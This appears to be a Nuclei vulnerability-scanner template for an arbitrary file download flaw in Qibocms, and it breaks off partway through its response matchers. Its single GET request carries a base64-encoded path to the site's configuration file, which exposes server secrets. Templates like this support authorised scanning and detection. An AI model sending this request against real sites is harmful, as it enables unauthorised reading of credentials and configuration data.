id: qibocms-file-download info: name: Qibocms - Arbitrary File Download author: theabhinavgaur severity: high description: Qibocms is vulnerable to arbitrary file download vulnerability. metadata: verified: true max-request: 1 tags: qibocms,lfr http: - method: GET path: - "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8" matchers-condition: and matchers: - type: word part: body words: - "